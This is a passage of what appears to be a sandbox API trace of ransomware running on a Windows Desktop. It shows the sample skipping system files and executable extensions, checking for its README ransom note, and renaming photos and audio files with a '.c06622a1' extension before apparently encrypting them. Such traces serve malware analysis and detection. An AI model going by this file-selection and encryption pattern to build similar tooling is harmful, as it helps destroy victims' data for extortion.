(_Str1="msc", _Str2="m4a") returned 63 [0155.721] wcslen (_String="msc") returned 0x3 [0155.721] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0155.721] wcslen (_String="msp") returned 0x3 [0155.721] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0155.721] wcslen (_String="msstyles") returned 0x8 [0155.721] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0155.721] wcslen (_String="msu") returned 0x3 [0155.721] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0155.721] wcslen (_String="nls") returned 0x3 [0155.721] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0155.721] wcslen (_String="nomedia") returned 0x7 [0155.721] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0155.721] wcslen (_String="ocx") returned 0x3 [0155.721] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0155.721] wcslen (_String="prf") returned 0x3 [0155.721] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0155.721] wcslen (_String="ps1") returned 0x3 [0155.721] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0155.721] wcslen (_String="rom") returned 0x3 [0155.721] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0155.721] wcslen (_String="rtp") returned 0x3 [0155.721] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0155.721] wcslen (_String="scr") returned 0x3 [0155.721] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0155.722] wcslen (_String="shs") returned 0x3 [0155.722] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0155.722] wcslen (_String="spl") returned 0x3 [0155.722] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0155.722] wcslen (_String="sys") returned 0x3 [0155.722] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0155.722] wcslen (_String="theme") returned 0x5 [0155.722] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0155.722] wcslen (_String="themepack") returned 0x9 [0155.722] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0155.722] wcslen (_String="wpx") returned 0x3 [0155.722] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0155.722] wcslen (_String="lock") returned 0x4 [0155.722] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0155.722] wcslen (_String="key") returned 0x3 [0155.722] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0155.722] wcslen (_String="hta") returned 0x3 [0155.722] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0155.722] wcslen (_String="msi") returned 0x3 [0155.722] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0155.722] wcslen (_String="pdb") returned 0x3 [0155.722] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0155.722] wcslen (_String="sqlite") returned 0x6 [0155.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.722] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.722] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.722] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.722] wcscpy (in: _Dest=0x208e74, _Source="-uY5xVhL.m4a" | out: _Dest="-uY5xVhL.m4a") returned="-uY5xVhL.m4a" [0155.723] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a", dwFileAttributes=0x80) returned 1 [0155.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-uy5xvhl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0155.723] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.723] ReadFile (in: hFile=0x1cc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.724] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xd84a5811 [0155.724] RtlComputeCrc32 (PartialCrc=0x5811, Buffer=0x32ec24, Length=0x80) returned 0xcf8e3e33 [0155.724] RtlComputeCrc32 (PartialCrc=0x3e33, Buffer=0x32ec24, Length=0x80) returned 0xf1af0b49 [0155.724] RtlComputeCrc32 (PartialCrc=0xb49, Buffer=0x32ec24, Length=0x80) returned 0x484da7a3 [0155.724] RtlComputeCrc32 (PartialCrc=0xa7a3, Buffer=0x32ec24, Length=0x80) returned 0x7fd2d50e [0155.724] CloseHandle (hObject=0x1cc) returned 1 [0155.724] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.724] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a" [0155.724] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a") returned 0x36 [0155.724] wcscpy (in: _Dest=0x218e94, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.724] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-uy5xvhl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-uy5xvhl.m4a.c06622a1"), dwFlags=0x8) returned 1 [0155.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-uY5xVhL.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-uy5xvhl.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0155.728] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.728] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0155.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5d7bca86 [0155.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd54795e [0155.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2f589158 [0155.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x752e45ff [0155.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4abd0582 [0155.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x17f0b41d [0155.732] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d55d98b [0155.733] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2bc5c78d [0155.736] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xb0d9c4e [0155.736] RtlComputeCrc32 (PartialCrc=0x9c4e, Buffer=0x710094, Length=0x80) returned 0xbc1adec4 [0155.736] RtlComputeCrc32 (PartialCrc=0xdec4, Buffer=0x710094, Length=0x80) returned 0x8c3b7e3f [0155.736] RtlComputeCrc32 (PartialCrc=0x7e3f, Buffer=0x710094, Length=0x80) returned 0x4a08c395 [0155.736] RtlComputeCrc32 (PartialCrc=0xc395, Buffer=0x710094, Length=0x80) returned 0x8bf4f646 [0155.736] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0155.736] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.736] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.736] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dfe9fe0, ftCreationTime.dwHighDateTime=0x1d5e017, ftLastAccessTime.dwLowDateTime=0x945f0b10, ftLastAccessTime.dwHighDateTime=0x1d5d977, ftLastWriteTime.dwLowDateTime=0x945f0b10, ftLastWriteTime.dwHighDateTime=0x1d5d977, nFileSizeHigh=0x0, nFileSizeLow=0x38dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="-ZttmbsUjlvhPhcT.m4a", cAlternateFileName="-ZTTMB~1.M4A")) returned 1 [0155.736] _wcsicmp (_Str1="-ZttmbsUjlvhPhcT.m4a", _Str2="README.c06622a1.TXT") returned -69 [0155.736] wcsstr (_Str="-ZttmbsUjlvhPhcT.m4a", _SubStr="README") returned 0x0 [0155.736] _wcsicmp (_Str1="autorun.inf", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 52 [0155.736] wcslen (_String="autorun.inf") returned 0xb [0155.736] _wcsicmp (_Str1="boot.ini", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 53 [0155.736] wcslen (_String="boot.ini") returned 0x8 [0155.736] _wcsicmp (_Str1="bootfont.bin", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 53 [0155.736] wcslen (_String="bootfont.bin") returned 0xc [0155.736] _wcsicmp (_Str1="bootsect.bak", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 53 [0155.736] wcslen (_String="bootsect.bak") returned 0xc [0155.736] _wcsicmp (_Str1="desktop.ini", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 55 [0155.736] wcslen (_String="desktop.ini") returned 0xb [0155.736] _wcsicmp (_Str1="iconcache.db", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 60 [0155.736] wcslen (_String="iconcache.db") returned 0xc [0155.736] _wcsicmp (_Str1="ntldr", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 65 [0155.736] wcslen (_String="ntldr") returned 0x5 [0155.736] _wcsicmp (_Str1="ntuser.dat", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 65 [0155.736] wcslen (_String="ntuser.dat") returned 0xa [0155.736] _wcsicmp (_Str1="ntuser.dat.log", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 65 [0155.736] wcslen (_String="ntuser.dat.log") returned 0xe [0155.736] _wcsicmp (_Str1="ntuser.ini", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 65 [0155.736] wcslen (_String="ntuser.ini") returned 0xa [0155.737] _wcsicmp (_Str1="thumbs.db", _Str2="-ZttmbsUjlvhPhcT.m4a") returned 71 [0155.737] wcslen (_String="thumbs.db") returned 0x9 [0155.737] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0155.737] wcslen (_String="386") returned 0x3 [0155.737] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0155.737] wcslen (_String="adv") returned 0x3 [0155.737] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0155.737] wcslen (_String="ani") returned 0x3 [0155.737] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0155.737] wcslen (_String="bat") returned 0x3 [0155.737] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0155.737] wcslen (_String="bin") returned 0x3 [0155.737] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0155.737] wcslen (_String="cab") returned 0x3 [0155.737] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0155.737] wcslen (_String="cmd") returned 0x3 [0155.737] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0155.737] wcslen (_String="com") returned 0x3 [0155.737] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0155.737] wcslen (_String="cpl") returned 0x3 [0155.737] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0155.737] wcslen (_String="cur") returned 0x3 [0155.737] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0155.737] wcslen (_String="deskthemepack") returned 0xd [0155.737] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0155.737] wcslen (_String="diagcab") returned 0x7 [0155.737] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0155.737] wcslen (_String="diagcfg") returned 0x7 [0155.737] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0155.737] wcslen (_String="diagpkg") returned 0x7 [0155.737] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0155.737] wcslen (_String="dll") returned 0x3 [0155.737] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0155.737] wcslen (_String="drv") returned 0x3 [0155.737] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0155.737] wcslen (_String="exe") returned 0x3 [0155.737] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0155.738] wcslen (_String="hlp") returned 0x3 [0155.738] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0155.738] wcslen (_String="icl") returned 0x3 [0155.738] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0155.738] wcslen (_String="icns") returned 0x4 [0155.738] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0155.738] wcslen (_String="ico") returned 0x3 [0155.738] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0155.738] wcslen (_String="ics") returned 0x3 [0155.738] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0155.738] wcslen (_String="idx") returned 0x3 [0155.738] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0155.738] wcslen (_String="ldf") returned 0x3 [0155.738] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0155.738] wcslen (_String="lnk") returned 0x3 [0155.738] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0155.738] wcslen (_String="mod") returned 0x3 [0155.738] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0155.738] wcslen (_String="mpa") returned 0x3 [0155.738] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0155.738] wcslen (_String="msc") returned 0x3 [0155.738] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0155.738] wcslen (_String="msp") returned 0x3 [0155.738] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0155.738] wcslen (_String="msstyles") returned 0x8 [0155.738] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0155.738] wcslen (_String="msu") returned 0x3 [0155.738] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0155.738] wcslen (_String="nls") returned 0x3 [0155.738] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0155.738] wcslen (_String="nomedia") returned 0x7 [0155.738] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0155.738] wcslen (_String="ocx") returned 0x3 [0155.738] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0155.738] wcslen (_String="prf") returned 0x3 [0155.738] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0155.739] wcslen (_String="ps1") returned 0x3 [0155.739] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0155.739] wcslen (_String="rom") returned 0x3 [0155.739] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0155.739] wcslen (_String="rtp") returned 0x3 [0155.739] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0155.739] wcslen (_String="scr") returned 0x3 [0155.739] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0155.739] wcslen (_String="shs") returned 0x3 [0155.739] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0155.739] wcslen (_String="spl") returned 0x3 [0155.739] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0155.739] wcslen (_String="sys") returned 0x3 [0155.739] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0155.739] wcslen (_String="theme") returned 0x5 [0155.739] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0155.739] wcslen (_String="themepack") returned 0x9 [0155.739] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0155.739] wcslen (_String="wpx") returned 0x3 [0155.739] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0155.739] wcslen (_String="lock") returned 0x4 [0155.739] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0155.739] wcslen (_String="key") returned 0x3 [0155.739] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0155.739] wcslen (_String="hta") returned 0x3 [0155.739] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0155.739] wcslen (_String="msi") returned 0x3 [0155.739] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0155.739] wcslen (_String="pdb") returned 0x3 [0155.739] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0155.739] wcslen (_String="sqlite") returned 0x6 [0155.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.740] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.740] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.740] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.740] wcscpy (in: _Dest=0x208e74, _Source="-ZttmbsUjlvhPhcT.m4a" | out: _Dest="-ZttmbsUjlvhPhcT.m4a") returned="-ZttmbsUjlvhPhcT.m4a" [0155.740] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a", dwFileAttributes=0x80) returned 1 [0155.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-zttmbsujlvhphct.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.740] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.740] ReadFile (in: hFile=0x1a8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.741] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x7f706eca [0155.741] RtlComputeCrc32 (PartialCrc=0x6eca, Buffer=0x32ec24, Length=0x80) returned 0x877d747d [0155.741] RtlComputeCrc32 (PartialCrc=0x747d, Buffer=0x32ec24, Length=0x80) returned 0x52cc6ed0 [0155.741] RtlComputeCrc32 (PartialCrc=0x6ed0, Buffer=0x32ec24, Length=0x80) returned 0x292d1be5 [0155.741] RtlComputeCrc32 (PartialCrc=0x1be5, Buffer=0x32ec24, Length=0x80) returned 0xf419dbc5 [0155.741] CloseHandle (hObject=0x1a8) returned 1 [0155.741] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.741] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a" [0155.741] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a") returned 0x3e [0155.741] wcscpy (in: _Dest=0x218ea4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.741] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-zttmbsujlvhphct.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-zttmbsujlvhphct.m4a.c06622a1"), dwFlags=0x8) returned 1 [0155.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-ZttmbsUjlvhPhcT.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-zttmbsujlvhphct.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0155.744] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.744] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x79c3ff42 [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xaa89b7e [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f377ee8 [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63732926 [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6f054c42 [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x59b26517 [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xcc3c7ab [0155.751] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x467eb2d [0155.755] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xa9d0c4a [0155.755] RtlComputeCrc32 (PartialCrc=0xc4a, Buffer=0x2690094, Length=0x80) returned 0x410117e6 [0155.755] RtlComputeCrc32 (PartialCrc=0x17e6, Buffer=0x2690094, Length=0x80) returned 0x20170913 [0155.755] RtlComputeCrc32 (PartialCrc=0x913, Buffer=0x2690094, Length=0x80) returned 0x7fe5d06c [0155.755] RtlComputeCrc32 (PartialCrc=0xd06c, Buffer=0x2690094, Length=0x80) returned 0xd6df317b [0155.755] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0155.755] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.755] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.755] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2edda0, ftCreationTime.dwHighDateTime=0x1d5e464, ftLastAccessTime.dwLowDateTime=0xcbc8cf50, ftLastAccessTime.dwHighDateTime=0x1d5dcc9, ftLastWriteTime.dwLowDateTime=0xcbc8cf50, ftLastWriteTime.dwHighDateTime=0x1d5dcc9, nFileSizeHigh=0x0, nFileSizeLow=0x18e0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="0XvFdhIAi1nsFBCVZ.jpg", cAlternateFileName="0XVFDH~1.JPG")) returned 1 [0155.755] _wcsicmp (_Str1="0XvFdhIAi1nsFBCVZ.jpg", _Str2="README.c06622a1.TXT") returned -66 [0155.755] wcsstr (_Str="0XvFdhIAi1nsFBCVZ.jpg", _SubStr="README") returned 0x0 [0155.755] _wcsicmp (_Str1="autorun.inf", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 49 [0155.755] wcslen (_String="autorun.inf") returned 0xb [0155.755] _wcsicmp (_Str1="boot.ini", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 50 [0155.755] wcslen (_String="boot.ini") returned 0x8 [0155.755] _wcsicmp (_Str1="bootfont.bin", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 50 [0155.755] wcslen (_String="bootfont.bin") returned 0xc [0155.755] _wcsicmp (_Str1="bootsect.bak", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 50 [0155.755] wcslen (_String="bootsect.bak") returned 0xc [0155.755] _wcsicmp (_Str1="desktop.ini", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 52 [0155.756] wcslen (_String="desktop.ini") returned 0xb [0155.756] _wcsicmp (_Str1="iconcache.db", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 57 [0155.756] wcslen (_String="iconcache.db") returned 0xc [0155.756] _wcsicmp (_Str1="ntldr", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 62 [0155.756] wcslen (_String="ntldr") returned 0x5 [0155.756] _wcsicmp (_Str1="ntuser.dat", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 62 [0155.756] wcslen (_String="ntuser.dat") returned 0xa [0155.756] _wcsicmp (_Str1="ntuser.dat.log", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 62 [0155.756] wcslen (_String="ntuser.dat.log") returned 0xe [0155.756] _wcsicmp (_Str1="ntuser.ini", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 62 [0155.756] wcslen (_String="ntuser.ini") returned 0xa [0155.756] _wcsicmp (_Str1="thumbs.db", _Str2="0XvFdhIAi1nsFBCVZ.jpg") returned 68 [0155.756] wcslen (_String="thumbs.db") returned 0x9 [0155.756] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0155.756] wcslen (_String="386") returned 0x3 [0155.756] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0155.756] wcslen (_String="adv") returned 0x3 [0155.756] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0155.756] wcslen (_String="ani") returned 0x3 [0155.756] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0155.756] wcslen (_String="bat") returned 0x3 [0155.756] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0155.756] wcslen (_String="bin") returned 0x3 [0155.756] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0155.756] wcslen (_String="cab") returned 0x3 [0155.756] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0155.756] wcslen (_String="cmd") returned 0x3 [0155.756] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0155.756] wcslen (_String="com") returned 0x3 [0155.756] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0155.756] wcslen (_String="cpl") returned 0x3 [0155.756] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0155.756] wcslen (_String="cur") returned 0x3 [0155.756] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0155.757] wcslen (_String="deskthemepack") returned 0xd [0155.757] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0155.757] wcslen (_String="diagcab") returned 0x7 [0155.757] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0155.757] wcslen (_String="diagcfg") returned 0x7 [0155.757] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0155.757] wcslen (_String="diagpkg") returned 0x7 [0155.757] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0155.757] wcslen (_String="dll") returned 0x3 